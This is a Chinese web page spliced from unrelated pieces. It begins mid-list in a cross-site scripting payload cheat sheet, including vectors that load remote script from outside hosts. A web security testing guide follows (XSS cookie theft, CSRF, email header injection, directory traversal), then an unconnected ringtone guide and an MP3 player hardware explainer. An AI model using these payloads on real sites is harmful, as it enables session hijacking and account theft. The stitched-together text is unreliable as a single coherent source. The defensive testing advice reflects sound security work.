SRC=javascrīpt:alert('XSS')></FRAME></FRAMESET> <TABLE BACKGROUND="javascrīpt:alert('XSS')"> <DIV STYLE="background-image: url(javascrīpt:alert('XSS'))"> <DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');"> <DIV STYLE="width: expression(alert('XSS'));"> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <IMG STYLE='xss:expre\ssion(alert("XSS"))'> <STYLE TYPE="text/javascrīpt">alert('XSS');</STYLE> <STYLE TYPE="text/css">.XSS{background-image:url("javascrīpt:alert('XSS')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascrīpt:alert('XSS')")}</STYLE> <BASE HREF="javascrīpt:alert('XSS');//"> getURL("javascrīpt:alert('XSS')") a="get";b="URL";c="javascrīpt:";d="alert('XSS');";eval(a+b+c+d); <XML SRC="javascrīpt:alert('XSS');"> "> <BODY ōNLOAD="a();"><scrīpt>function a(){alert('XSS');}</scrīpt><" <scrīpt SRC="/Article/UploadFiles/200608/20060827171609376.jpg"></scrīpt> <IMG SRC="javascrīpt:alert('XSS')" <!--#exec cmd="/bin/echo '<scrīpt SRC'"--><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></scrīpt>'"--> <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> <scrīpt a=">" SRC="http://xss.ha.ckers.org/a.js"></scrīpt> <scrīpt =">" SRC="http://xss.ha.ckers.org/a.js"></scrīpt> <scrīpt a=">" '' SRC="http://xss.ha.ckers.org/a.js"></scrīpt> <scrīpt "a='>'" SRC="http://xss.ha.ckers.org/a.js"></scrīpt> <scrīpt>document.write("<SCRI");</scrīpt>PT SRC="http://xss.ha.ckers.org/a.js"></scrīpt> <A HREF=http://www.gohttp://www.google.com/ogle.com/>link</A>

• 最后,当用户浏览时便会弹出一个警告框，内容显示的是浏览者当前的cookie串,这就说明该网站存在XSS漏洞。
• 试想如果我们注入的不是以上这个简单的测试代码，而是一段经常精心设计的恶意脚本，当用户浏览此帖时，cookie信息就可能成功的被攻击者获取。此时浏览者的帐号就很容易被攻击者掌控了。

  (2)如何预防XSS漏洞?
    从应用程序的角度来讲,要进行以下几项预防:

• 对Javascrīpt,VB scrīpt, HTML,ActiveX, Flash等语句或脚本进行转义.
• 在服务端正式处理之前提交数据的合法性(合法性检查主要包括三项:数据类型,数据长度,敏感字符的校验)进行检查等。最根本的解决手段,在确认客户端的输入合法之前,服务端拒绝进行关键性的处理操作.

    从测试人员的角度来讲,要从需求检查和执行测试过程两个阶段来完成XSS检查:

• 在需求检查过程中对各输入项或输出项进行类型、长度以及取值范围进行验证，着重验证是否对HTML或脚本代码进行了转义。
• 执行测试过程中也应对上述项进行检查。
  

 
  3.CSRF:(跨站点伪造请求)
    CSRF尽管听起来像跨站脚本（XSS），但它与XSS非常不同，并且攻击方式几乎相左。
    XSS是利用站点内的信任用户，而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。
    XSS也好，CSRF也好，它的目的在于窃取用户的信息，如SESSION 和 COOKIES（关于SESSION 和COOKIES的介绍请参见我的另一篇BLOG：http://www.51testing.com/?49689/action_viewspace_itemid_74885.html），
   (1)如何进行CSRF测试？
    关于这个主题本人也正在研究，目前主要通过安全性测试工具来进行检查。
   (2)如何预防CSRF漏洞？

• 请参见http://www.hanguofeng.cn/archives/security/preventing-csrf
• 请参见http://getahead.org/blog/joe/2007/01/01/csrf_attacks_or_how_to_avoid_exposing_your_gmail_contacts.html

  4.Email Header Injection(邮件标头注入)  
    Email Header Injection：如果表单用于发送email,表单中可能包括“subject”输入项（邮件标题），我们要验证subject中应能escape掉“\n”标识。

• <!--[if !supportLists]--> <!--[endif]-->因为“\n”是新行，如果在subject中输入“hello\ncc:spamvictim@example.com”，可能会形成以下

Subject: hello

cc: spamvictim@example.com

• <!--[if !supportLists]--> <!--[endif]-->如果允许用户使用这样的subject，那他可能会给利用这个缺陷通过我们的平台给其它用户发送垃圾邮件。
  

  5.Directory Traversal(目录遍历)
   （1）如何进行目录遍历测试？

• 目录遍历产生的原因是：程序中没有过滤用户输入的“../”和“./”之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。
• 测试方法：在URL中输入一定数量的“../”和“./”，验证系统是否ESCAPE掉了这些目录跳转符。
  

   （2）如何预防目录遍历？

• 限制Web应用在服务器上的运行

• 进行严格的输入验证，控制用户输入非法路径

  6.exposed error messages(错误信息)
  （1）如何进行测试？

• 首先找到一些错误页面，比如404,或500页面。
• 验证在调试未开通过的情况下，是否给出了友好的错误提示信息比如“你访问的页面不存在”等，而并非曝露一些程序代码。
  

  （2）如何预防？

• 测试人员在进行需求检查时，应该对出错信息进行详细查，比如是否给出了出错信息，是否给出了正确的出错信息。
  

  

 

[推荐] 手机铃声知多少，新手必看！！
一　看透铃声格式

 

　　在手机支持和弦数不断增加的同时，手机所支持的铃声格式也越来越多。目前主流的手机铃声格式有MMF、MIDI 、WAV、 AMR、 MP3、 IMY、 RTTL、 M3U、 AAC等。其中MMF和MIDI是目前手机上支持最多的格式；而过去的单音铃声手机大多数采用的是IMY和RTTL格式。

 

（1）　MMF

 

　　MMF(Application Fprmat)和SMF(MIDI)等格式的铃声相比，优点是文档小、音乐表现力强。另外，MMF格式是资源最丰富的铃声格式，在网上我们很容易就可以找到。

 

（2）　MIDI（含MID）

 

　　MIDI(Musical Instrument Digital Interface MIDI-sequention Sound)是SMF(标准的MIDI文件)的多媒体数据形式，它就像交响乐团用的乐谱一样，只记录在何时使用什么乐器，以及乐长、音调的信息（特别说明：它不能表现真人真唱）。MIDI信息所占空间比较小，非常适合在手机中使用，但其最大的缺点就是声音的音量较小，不过现在可以在网上找到一些软件进行调节。

 

（3）　AMR

 

　　AMR(Adaptive Multi-Rate)是一种应用在手机上的一种语音压缩格式，也就是说我们用手机录音而成的文件就是这种格式的。AMR格式压缩率较高但是音质相对较差了一点。优点就是我们可以随心所欲地录制。

 

（4）　WAV

 

　　WAV(Waveform Audio)是一种标准的声音文件格式，但与其它的压缩格式的文件比起来，占据的存储空间较大，不过在音质方面就非常的出众，如果你的手机内存足够大的话它还是很有使用价值的。

 

（5）　MP3

 

　　MP3(MPEG Layer 3)做手机铃声虽然是最近才开始流行的，不过想必大家对它都已经很熟悉了吧，摩托罗拉E398、索尼爱立信K700c、诺基亚6230等等都是很好的“MP3播放器”。MP3是由ISO/MPEG语音编码标准（Audio Coding Standard）所制定的一种声音的压缩技术，使用这种技术可以将一般未压缩的音乐数据压缩至1:10到1:12大小，而且保持在人耳几乎无法分辨出来的失真率。不过相对手机产品来讲，MP3所占的内存空间仍然不小，因此支持这种音乐（铃声）格式的手机一般都具有比较大的内存空间或可以进行外部内存扩展的。

 

（6）　IMY

 

　　iMelody(iMelody Ringtone Format)简称为IMY格式，这可是过去爱立信公司的看家铃声格式。同样它也具有占有空间小、容易编辑等特点，因此曾被EMS（增强型短信）作为铃声标准。

 

（7）　RTT

 

　　RTTTL(Ringing Tones Text Transfer Language)是诺基亚系列手机常用的铃声格式，它能自动将MIDI包含的多个音轨转化成简谱显示，并可以随意地修改、删除音符。使用RTTTL的好处是它以纯文字格式储存，传送及修改都很方便，但不好的地方就是不能即时试听

 

(8)  AAC

 

   AAC也即MP4音频，即“高级音频编码（Advanced Audio Coding）”，它是由MP3专利的拥有者Fraunhofer IIS联合杜比、AT&T、索尼、苹果等产业巨头共同开发出的一种数字音频压缩方式。它增加了诸如对立体声的完美再现、比特流效果音扫描、多媒体控制、降噪等MP3没有的特性，使得在音频压缩后仍能完美的再现CD的音质。开发这种音频编码的主要目的就是为了取代MP3现有的地位。
    AAC可以说是极为全面的编码方式，一方面，多声道和高采样率的特点使得它非常适合未来的DVD－Audio；另一方面，低码率下的高音质则使它也适合移动通讯、网络电话、在线广播等领域，真是全能啊！。

 

二　手机铃声制作

 

　　当我们拥有一首好听的MP3、一张难得的音乐CD时，是否不止一次的想把里面的动人音乐或歌声变成自己的手记铃声？但不是每一款手机都支持MP3格式铃声，怎么办？又不是每款手机都有MMC/SD外部扩展卡，内存太小，怎么办？不用着急，下面我就介绍几种简单的铃声制作方法和软件。

 

　　较早的手机大多不支持和弦以及GPRS的铃声下载，所以大部分的手机都带有自编铃声功能，但每一种品牌的手机其自编铃声的方法都不太一样，想要自己编出理想的音乐必须对手机的编曲方法有所了解才行，因此我推荐在网上找编好的曲目。

 

（1）　MID/MMF铃声制作

 

　　谈到MIDI，大家肯定会想到Cakewalk软件，而MMF作为MIDI格式的变种，最适合它的就是PSMPlay软件了，你只需要将制作好的MIDI文件用PSMPlay软件就可以很轻松的转换成你想要的MMF铃声文件。甚至还可以使用WAV to MMF转换软件，将WAV文件转换成MMF文件，但这种情况下MMF所占的文件大小就比MIDI转换的文件大许多了，内存小的朋友要注意哦。

 

（2）　MP3/WAV铃声制作

 

　　MP3格式的音乐相信大家都很熟悉了，而WAV文件完全可以利用CD光盘来直接转换得到（超级解霸自带的转换器就可以很方便地将CD转成WAV格式）。不过MP3以及WAV文件所占的内存空间一般都是比较大的，但我们可以使用“音乐大师Sound forge”以及“Samplitude Producer”或“GoldWave”、“Cool Edit Pro”等软件截取歌曲中最好听的部分，保存为相应的铃声文件。同时，还可以利用最原始的Windows自带的录音机，也可以非常轻松地制作和截取WAV格式文件。

 

（3）　和弦铃声制作

 

　　制作和弦铃声就比较“专业”一点了，我们可以用“PSMplayer”，它支持多种格式的音乐、铃声文件的相互转换，还可以根据你的手机所支持的和弦音数来选择转换成多少和弦，很方便。不过有一点大家需要注意：如果你的手机不支持高和弦数的话，即使选择了转换成高数目的和弦铃声，也只能体现出手机本身的最大和弦效果。

 

三　怎样获得铃声

 

　　你知道哪种方法是比较适合你的手机以最快、最方便的方法获得铃声吗？下面就讲讲目前比较常用的铃声获得方式。

 

（1）　数据线

 

　　现在的大多数手机在售卖的时候都会配送数据线以及软件光盘，即使没有原配的数据线我们也可以自行购买到合适的兼容产品。使用时要先在电脑上准备好铃声，再把数据线（还有驱动程序）安装设置好，然后启动相应的软件通过电脑与手机的数据传输便完成铃声的下载。

 

　　这种方法的好处是：速度稳定。

 

（2）　红外线

 

　　红外方式的操作步骤比较简单，首先要在电脑上安装红外线适配器（很容易买得到，大概在50－150元之间），然后要确保你的手机已经打开红外传输功能，接下来把手机的红外端口与电脑的红外适配器相对（注意距离不要太远，大约5cm之内为最宜）。当连接成功时，电脑会出现提示音，然后选择要传送到手机上的文件，点击“发送”按钮，电脑会显示发送状态，与此同时手机会出现确认信息。这时按下手机上的确认键，文件便会开始传送。

 

　　这种方式的缺点是：速度慢且稳定性较差。

 

（3）　蓝牙方式

 

　　蓝牙（Bluetooth）技术是未来取代红外线的无线传输技术，比红外最大的优势就是传输距离更远、速度更快。通过2.4GHZ频段传输数据，而且没有红外线的有效传输方位的限制。但你的手机和电脑必须具备蓝牙功能（电脑上可以装一个蓝牙适配器）。

 

（4）　网上下载方式

 

　　前面介绍的几种方法都需要有相应的附件才能完成，不过如果你没有这些东西照样可以在网上进行下载。现在有很多的网络营运商（也称SP）都提供了一系列的增值服务，我们可以用手机进行上网，登陆他们的网站然后根据网站的说明把你需要的铃声进行保存下载。

 

（5）　短信方式

 

　　这是最常见的一种方法，当我们打开一个提供铃声下载的网站时，你可以选择适合自己的手机类型的铃声，而且还可以可以预先试听，找到喜欢的就可以通过短信下载到手机使用了。这种方法比较简单、实用，价格也相对较低，不过不能获得MP3等效果较好的铃声。

 

　　除了上面介绍外还可以通过彩e、彩信附件发送等方法，也可以通过手机的录音功能来录制真人声音作为铃声（需要手机支持），大家可以根据自己的情况，选择最好、最适合的一种。

 

四   铃声格式转换工具

 

    下面是一些我用到的常用工具软件：

 

  （1）.MP3 Cutter Joiner —— 音频编辑工具。功能强大、简单易用，可以将音频文件进行分割，也可以将多个音频文件合并为一个文件。支持MP3、WAV、WMA以及OGG格式，支持批量处理。

 

  （2）.PSMPLAYv4.0—— wav、mmf、mid转换和编辑软件（包括适当增大mid,mmf的音量）。

 

  （3）.GoldWave —— 铃声修改器*。可对wav,mp3等铃声进行剪辑、相互转换的小巧软件，还可以调整音量大小，等等。

 

  （4）.wavecn —— 录音、音频编辑、音频转换、音频效果处理的功能强大的编辑工具。

 

  （5）.CakeWalk9 —— mid铃声制作专业工具软件*。

 

  （6）.MMPoly（Mobile Music Polyphonic） —— mp3转换mmf的易用软件。

 

  （7）.Adobe Audition —— 声音编辑、修改、转换软件。功能强大的，支持wav、mp3、wma……等格式。对mid也可剪辑、调整音高和节奏。

 

  （8）.AMRConverter —— AMR与WAV相互转换的小软件。转换功能如下：
  ① AMR转换成——8000kHz,16位的WAV；
  ② 8000kHz,16位，单声道的WAV——转换成AMR。(建议用GoldWave转换WAV)

 

  （9）.Midi2wav —— mid转换wav的软件。

 

  （10）.WIDIPro_3_ViVAX —— mp3转换mid的软件。（一般来说mp3音乐[仅乐器声]转换mid效果很差，只有简单的、较单一的器乐声的音乐才可能转换的好一点）

 

  （11）. Foobar2000 —— 是一个 Windows 平台下的高级音频播放器/转换器。音频格式支持： WAV, AIFF, VOC, AU, SND, Ogg Vorbis, MPC, MP2, MP3,AAC,APE。（注：MP3转换AAC时，MP3的位速≤100kbps，音频采样级别选44100、16000、8000Hz等为好；且立体声的比单声的效果好。）

 

（一） MP3基本知识及构成
1、MP3是什么？
MP3是一种有损数字音频压缩格式。全称是Mpeg-1audioLayer3，其中MPEG是MovingPictureExpertsGroup的缩写，意思是动态图象专家组。所谓“有损压缩音频格式”也就是对数字音频使用了对音质有损耗的压缩方式，以达到缩小文件大小的目的，来满足复制、存储、传输的需要。MP3的压缩率可以达到1：12，但在人耳听起来，却并没有什么失真，因为它将超出人耳听力范围的声音从数字音频中去掉，而不改变最主要的声音。此外，MP3随身听也可以上传、下载其他任何格式的电脑文件，具有移动存储功能。

2、MP3随身听的构成
MP3随身听其实就是一个功能特定的小型电脑。在它小小的机身里，拥有存储器（存储卡）、显示器（LCD显示屏）、中央处理器[MCU（微控制器）或解码DSP（数字信号处理器）]等。

3、MP3随身听的工作流程
当微型操作系统加载完成后，MCU开始为操作系统所控制，执行它所指定的各种功能。对于MP3随身听而言，这个功能最主要的就是播放MP3音乐了。播放的过程就是MP3音乐文件的解码过程，MCU利用自身的CPU的运算能力来承担繁重的MP3音乐文件解码任务。当MP3音乐下载至MP3随身听后一般多存储在机身内置闪存或硬盘里，在播放的过程中，MCU将其从存储介质里读取出来，缓冲在RAM中，解码后播放出来。由于此时的信号是数字信号，耳机此类的模拟设备还无法播放，这时就需要由数/模转换器（DAC）来完成将数字信号转变为模拟信号的工作，然后通过耳机就可以播放出美妙的音乐了。

（二）MP3性能参数和技术知识
1、SRS（WOW）环绕音响效果
SRS（SoundRetrievalSystem）效果简单地说就是3D立体音响效果。WOW是由SRS、TRUBASS、BRIGHTNESS组成，能够把音质提升到从低到高的全景3D效果。SRS是WOW的核心技术，能够收集被干扰、散乱的音波，然后按照正常的途径的重放出来。它能够非常接近艺术家原创的水平和现场效果。TRUBASS能够将低频进行实用化的调和，还能够把很深的低频提升到八度音的水平并方位展示出来。BRIGHTNESS通过延伸的悦耳的音波来创造一个更高、更宽的音域，从而实现一个拉阔的效果。

2、EQ均衡器
Equalization（均衡）将声音中各频率的组成泛音等级加以修改，专为某一类音乐进行优化，增强人们的感觉。常见包括：正常、摇滚、流行、舞曲、古典、柔和、爵士、金属、重低音和自定义。自定义就是自己调节，没有套用固定的模式，按个人喜好而定的真正EQ。EQ音效能够弥补MP3压缩时候的信号损失，同时也满足了不同的个人听音喜好

3、SNR（SignaltoNoiseRatio，信噪比）
信噪比指在规定输入电压下的输出信号电压与输入电压切断时输出所残留之杂音电压之比，也可看成是最大不失真声音信号强度与同时发出的噪音强度之间的比率，通常以S/N表示，一般用分贝（dB）为单位。信噪比越高表示音频产品越好，常见的MP3随身听信噪比都在60dB以上，OPPOMP3的信噪比都在90dB以上，具有较高的优势。

4、FrequencyRespond频率响应
频率响应范围是最低有效声音频率到最高有效声音频率之间的范围，单位为赫兹（Hz）。它与音响系统的性能和价位有着直接的关系，其数值越小说明音箱的频响曲线越平坦、失真越小、性能越高。一般的MP3随身听的频响范围在20～20000Hz，而这一范围正好是人耳所能听到的声音频率范围。

5、SamplingRate（采样率）
数码音频系统是通过将声波波形转换成一连串的二进制数据来再现原始声音的，把模拟音频转成数字音频的过程就称作采样。实现这个过程使用的设备是模/数转换器（A/D）它以每秒上万次的速率对声波进行采样，每一次采样都记录下了原始模拟声波在某一时刻的状态，称之为样本。将一串的样本连接起来，就可以描述一段声波了，把每一秒钟所采样的数目称为采样率，单位为Hz（赫兹）。采样率越高所能描述的声波频率就越高，则音质越有保证，在录音时体现的最为明显。大部分的MP3随身听都支持播放44．1KHz的MP3音频文件。

6、OutputPower（输出功率）
指随身听耳机输出口中，以电压输出为主的非纯电压输出方式输出的功率，说明书上一般会有标称，耳机必须与随身听的输出功率相匹配。简单分析：耳机的阻抗越高，输出电压会变大，随身听的总功率就会减小，此时输出功率就会减小。当把音量开到很大的时候，功率减小更显著，此时就会产生所谓的失真现象。现在的MP3随身听在标配阻抗为16Ω的耳机的条件下，单一声道的最大输出功率一般在7～18mW之间。

7、USB接口
USB的全称是UniversalSerialBus（通用串行总线）。目前MP3产品普遍采用的是USB2.0接口，USB2.0分为两种：USB2.0FullSpeed（全速）和USB2.0HiSpeed（高速）。USB2.0FullSpeed的传输速率为12Mbps（兆位每秒），相当于1.5MB/s。目前大部分MP3为此类接口类型。USB2.0HiSpeed的理论传输速率可以达到480Mbps，相当于60MB/s，这意味着装满一个128MB的MP3随身听只需要2秒钟！但由于种种原因，实际上的传输速率远远没有达到这个数值，一般传输速率都没有超过10MB/s，不过能达到了数兆每秒，这个速度已经是足够快了。
另外，早期的MP3随身听采用的多是USB1.1的接口，它的一般传输速率是1.5Mbps，即相当于USB2.0（全速）的1/8。

8、Linein（线输入/直录功能）
从硬件角度来讲，Linein是用来接受线路等级信号的输入端子（插孔）。从功能角度讲，Linein是MP3直录功能。它可以通过音频线直接从CD机、VCD、录音机等外部音频设备取得音源进行录制，然后利用机内的MP3编码功能将其压缩成MP3格式音频文件。这样，无需经过电脑，照样可以将CD等音源录制成MP3音乐。

9、FirmWare（固件）
固件（具有软件功能的硬件）包括了对音乐的解码、界面控制、显示各种提示信息以及通过线路与电脑连接等，功能非常强大。固件升级可以解决已经存在的错误和兼容性问题、改善操作方式使之更加人性化、并能提供更多的音乐格式支持。

10、电池
电池一般为锂电池、7号或者5号电池，7号或者5号电池有可能为镍氢充电电池。锂电池最大的好处就是几乎无记忆效应，能量强。

11、TTS
TTS是同时运用语言学和心理学的杰出之作，在内置芯片的支持之下，通过神经网络的设计，把文字智能地转化为自然语音流。TTS技术对文本文件进行实时转换，转换时间之短可以秒计算。在其特有智能语音控制器作用下，文本输出的语音音律流畅，使得听者在听取信息时感觉自然，毫无机器语音输出的冷漠与生涩感。TTS语音合成技术即将覆盖国标一、二级汉字，具有英文接口，自动识别中、英文，支持中英文混读。所有声音采用真人普通话为标准发音，实现了120-150个汉字/秒的快速语音合成，朗读速度达3-4个汉字/秒，使用户可以听到清晰悦耳的音质和连贯流畅的语调。现在有少部分MP3随身听具有了TTS功能。

12、TXT文本阅读
TXT文本阅读是指MP3能够阅读TXT格式的文本，这使得消费者能够一边听音乐，一边阅读文本。

13、ID3信息
ID3标签是MP3音乐档案中的歌曲附加信息，它能够在MP3中附加曲子的演出者、作者以及其它类别资讯，方便众多乐曲的管理。缺少ID3标签并不会影响MP3的播放，但若没有的话，管理音乐文件也会相当的麻烦。如果你在网上download（下载）MP3音乐，里面多半已经写有预设的ID3信息。如果你想要将其清除重设，使用Winamp中的“Alt+3”热键，就能修改MP3档案中之的ID3标签。

14、 内存扩展槽 
扩充内存相当于给MP3随身听增加内存容量，根据MP3的不同，可以有CF卡、SM卡、MMC卡、SD卡等多种选择。CF卡是早期MP3使用的，现在因为体积和耗电的原因，已经很少用到了；SM卡在MP3随身听领域中应用较广，但目前已经比较少见了；MMC卡号称是目前世界上最小的Flash Memory存储卡，但由于价格的原因，现在使用这种卡的MP3随身听非常少；SD卡是在MMC卡基础上发展出来的，所以它也向下兼容－－换言之，如果你的MP3支持SD卡，那么它一般也可以支持MMC卡，但反过来MMC卡插槽的MP3就不支持SD卡。除了上面列举的几种卡外，SONY采用的是专用的记忆棒（Memory Stick），一般只用在SONY的机型上，很少看到其他产品使用。

（三）MP3随身听显示屏的分类
现在市场上的MP3随身听普遍具有了显示屏，并且有各种各样颜色的背光，近一年来彩屏MP3随身听也流行起来，人们对于MP3的显示效果也有了新的要求。下面我们来了解一下各种MP3随身听的显示屏。首先我们先了解一个概念——LCD（Liquid Crystal Display ，液晶显示屏），LCD是液晶显示屏的总称，并不代表某一种特定的液晶显示屏种类。MP3随身听由于体积的限制，采用的显示屏几乎都是LCD（OLED不属于LCD），只是不同种类的LCD罢了。
1、 FSTN（Film Super Twisted Nematic，薄膜超扭曲向列型）
FSTN屏幕属于STN的一种，是单色屏，虽然可以加入不同颜色的背光，但在某一时间只能显示一种颜色，同手机的黑白屏一样，是我们接触得最多的MP3显示屏了。FSTN属于被动矩阵式LCD器件，它的好处是功耗小、视角宽、成本不高，缺点是不能进行彩色显示，并且屏幕的响应速度慢，进行动态显示，比如玩游戏的时候，拖尾现象严重。

2、 CSTN（Color Super Twisted Nematic，彩色超扭曲向列型）
CSTN屏幕属于彩屏中的一种，它的显示原理是在传统单色STN液晶显示器上加一彩色滤光片，并将单色显示矩阵中的每一像素分成三个子像素，分别通过彩色滤光片显示红、绿、蓝三原色，三个子象素通过空间混色就可显示出彩色画面。
CSTN和FSTN显示原理相同，同样属于被动矩阵式LCD，省电是它的最大优点，同样存在着响应速度慢的缺点，同时，因为色彩补偿的问题，CSTN本身无法实现完全的黑白底色，因此它的色彩还原能力远远比不上TFT。CSTN屏幕多为4096色的，目前市场上采用此种彩屏的MP3随身听多为彩屏MP3中的中低价产品，如丹丁的DX-6，而信利的MP301采用的则是65K色的CSTN。
 
3、 TFT（Thin Film Transistor，薄膜晶体管）
TFT是有源矩阵类型液晶显示器（AM-LCD）中的一种，TFT是设在象素电极上的一个开关元件，可以“主动的”对屏幕上的各个独立的象素进行控制，这也就是所谓的主动矩阵（active matrix），TFT因为仍然是基于TN的结构，因此它可以提供比CSTN快的多的响应速度，同时由于TFT是主动式矩阵LCD，可让液晶的排列方式具有记忆性，不会在电压消失后马上恢复原状。TFT避免了交叉效应的产生，有效的提高了播放动态画面的能力，和STN相比TFT具有出色的色彩饱和度、还原能力和更高的对比度，更快的相应速度，但是缺点就是比较耗电，而且成本也比较高。目前市场上大多数的高档彩屏MP3随身听都使用了65K色TFT屏幕，也就是俗称的真彩，例如爱国者的P200和P770。

4、 OLED（Organic Light Emitting Display，有机发光显示屏）
OLED已经不再属于液晶显示（即LCD）的范畴了，OLED因为其自身的多种优越性能，已经被业内公认为下一代的主流显示技术。OLED显示技术与传统的LCD显示方式不同，它可以做到更薄更轻、主动发光（既不需要背光源）、广视角、高清晰、响应快速、能耗低、低温和抗震性能优异、柔性和环保设计等等。
从长远来说，OLED无疑是代表未来趋势的新技术，但是现阶段OLED还存在使用寿命短、屏幕大型化难等缺陷。目前市场上常见采用OLED的MP3随身听，大多为双色显示（蓝色和黄色），属于中高档彩屏产品，例如明基的JoyBee 200。

（四）MP3随身听的解码芯片和方案简介
解码芯片，它的作用顾名思义就是将存储在介质（Flash或者硬盘）上的MP3文件解码。它是MP3随身听工作中最重要的一环，很大程度上影响产品最终的音质表现。MP3是一种有损压缩的格式，如果MP3随身听拥有优秀的解码芯片就能够更好地还原音频信号的质量，很大程度上弥补音频信号的损失。
将MP3解码芯片、MCU（微处理器）、接口控制芯片再加上操作控制电路集成到一起（也就是我们前文《MP3随身听的构成原理图》中的那个“大黑块”），称为一个芯片方案，或者叫主芯片，我们常听到的什么PHILIPS×××芯片方案、SIGMATEL××××芯片方案，就是这个意思。比较知名的、高档一些的芯片方案，主要有PHILIPS、SIGMATEL、TELECHIPS，其它相对来说比较低端一些的有台湾SUNPLUS（凌阳）、珠海炬力等。
以SIGMATEL STMP3410芯片为例，我们就可以了解到“主芯片”的原理和作用了：
SIGMATEL STMP3410芯片原理框图
由原理图理论上我们可以看出，“主芯片”是以解码DSP（数字信号处理器）为核心的，集成了各种接口控制芯片和控制电路，所以它的实际作用已经远远不止是解码芯片了，但现实中人们仍然习惯性地称它们为“解码芯片”。
下面简要介绍前三种应用较广泛的芯片方案。
1、 PHILIPS芯片方案
iRiver和MPIO是MP3随身听发源地韩国的领导品牌，他们的产品无论是音质还是品质都是很有口碑的，这也成就了PHILIPS解码芯片的高端地位。PHILIPS 的系列芯片SAA7750、SAA7751、PNX0101ET本身仅仅是解码芯片，必须搭配其他的控制芯片才能使用。PHILIPS解码芯片本身价格就比较昂贵，再加上外围芯片整体成本就比较高了，因此采用PHILIPS解码芯片的MP3价格一般都比较昂贵。
（1）PHILIPS SSA7750EL芯片
PNX0101ET是SAA7750EL的改良型，外型体积小了，性能及功耗却有所提高。
部分采用PHILIPS SAA7750/7751解码芯片的MP3随身听代表产品有：iriver的IFP-100、300、500系列，MPIO的大部分机器（FD100、FL100、FY200、FG100等），MSC的G128，JNC SSF-200和创新（CREATIVE）的MX100、MX200等。
（2）PHILIPS PNX0101ET芯片
MPIO的FG100、FL300和iriver 的IFP-700、800、900、1000系列以及N10使用的是PNX0101ET芯片。
2、 SIGMATEL芯片方案
美国SIGMATEL公司的STMP 34××系列和35××系列芯片是目前市场上占有率最大的MP3解码芯片之一。它是几种最主流的解码芯片中唯一采用高集成单芯片的，因此采用SIGMATEL方案的机器整体外围结构比较简约，成本也容易控制，综合性价比应该算是最高的。其中SIGMATELSTMP34××系列芯片曾经因为结构简单、性价比高、方案成熟，被几乎所有的主流厂商所采用，也因此开发出了众多的附加功能，占据了MP3市场的大半河山，爱国者月光宝盒系列、JNC SSF-800和SAMSUNG YP-55H等市场热销型号都是采用经典的STMP3420芯片。
（1）SIGMATEL STMP3410芯片
在STMP34××系列大获成功的基础上，SIGMATEL于2004年推出了功能更为强大的STMP35××系列。魅族在年初于国内率先推出基于STMP3520芯片基础的ME系列一举获得成功，并奠定了一定的市场地位。如今采用STMP35××系列芯片的产品越来越多，大有取代STMP34××系列成为新一代市场霸主地位之势。
（2）SIGMATEL STMP3520芯片
3、 TELECHIPS芯片方案
韩国TELECHIPS的TCC730、TCC731也是性能较好的MP3解码芯片之一，其成本比起飞利浦的要低一些，但是同样需要外围元件的配合，因此成本比起单芯片来说还是要高。音质方面TELECHIPS同样保持在比较高的水准，而且由于韩国的民族情感比较强烈，TELECHIPS在韩国厂商中采用的还是比较多的，而韩国的整体MP3水平又比较高，所以TELECHIPS的芯片在整个MP3随身听中还是占有很高的市场份额，这也叫近水楼台先得月的一种吧。
TELECHIPS TCC730芯片
部分采用TELECHIPS芯片方案的MP3型号有：丹丁328系列、DEC街舞系列、WeWa!!王者之音，朝华魔音系列，信利MP301等机型。可以看出，其中主要是韩国的OEM产品，由此也可见TELECHIPS在韩国的普及。
（五）影响MP3随身听音质的因素
1、 存储器会影响音质吗？
首先来看看存储装置，它对MP3的音质有什么影响吗？存储装置主要是以文件形式保存数字编码，在这里的数字编码是用户保存进去的，因此存储装置只要能正确的还原保存上去的数字编码就可以了，而这是对存储装置的最基本要求，并且由于是数字信号，因此也不会存在信号强度、信噪比、失真等问题。因此可以说，在音质方面，存储装置不会造成任何影响，当然，如果使用HDD（hard disk drive，硬盘驱动器）方案，而电源部分未做好的话，可能会因为HDD的瞬间电流而造成些影响。 
2、 什么芯片方案的音质最好呢？
芯片方案（主芯片）是一个MP3随身听的绝对核心部分，它是一个高度集成的芯片，我们很难对它进行深度分析。但通过大量经验以及近年来市场用户反馈的情况来看，芯片方案的音质跟芯片公司的音频背景成正比，就三款主流芯片方案来说，音质排列顺序为：Philips > Sigmatel > Telchips。
但这个排列也并不绝对， 因为有很多 MP3 随身听制造商抛弃芯片方案内部的DAC
（数/模转换器）不用，而采用自己认为音质更高的DAC芯片来解决音质问题，并且这是一个非常有效的方法。那么DAC在改变整个MP3音质中到低占了多少比重呢？可能你会说占了决定性的作用，因为它是整个模拟信号的出口。当然，如果仅仅是从技术原理上分析，确实如此，但是一台放在货架上的MP3随身听可不仅仅这么简单，那还有什么重要因素呢？
3、 耳机对于音质的影响
已经有越来越多的用户开始注意MP3随身听的耳机了！确实，做为整个MP3随身听的唯一出口，它确实占据着非常重要的地位。因为不管硬件做的多么优秀，如果没有好的回放设备的话也只是徒劳。不过也不用一味要求使用高档耳机，因为一是存在着耳机与随身听搭配的问题，二是再好的耳机也只是能展现出MP3随身听的音质而已，而不能从根本上改变和提升MP3的音质。
4、 PCB布线的影响
首先，我们知道，所有的零件都是固定在PCB（Printed Circuit Board, 印刷电路板）上的，虽然是同样的电路，但是，不同的公司、不同的工程师所布出来的PCB却截然不同。而由于MP3芯片组本身集成度非常高，在同一块芯片上同时存在着很多种频率的信号。如果处理不当的话，就会造成信号间的干扰，造成音质变差，或者使随身听工作不稳定。
5、 软件的作用
实际上一般的公司在软件方面是没有能力进行任何对于音质有利的改进的。虽然软件在音质上不占有主导地位，但是如果软件设计的不好的话，也会使音质明显劣化。当然更重要的是，一个好的软件、好的操作逻辑才会让用户更加方便舒适的使用MP3随身听，这才是软件最重要的职能。
6、 电源设计
MP3随身听做为低功耗的小型音频设备，其电源的设计也是非常重要的。设计的不好，不但耗电量大不说，还有可能造成对音频信号的干扰。
7、 元器件选用
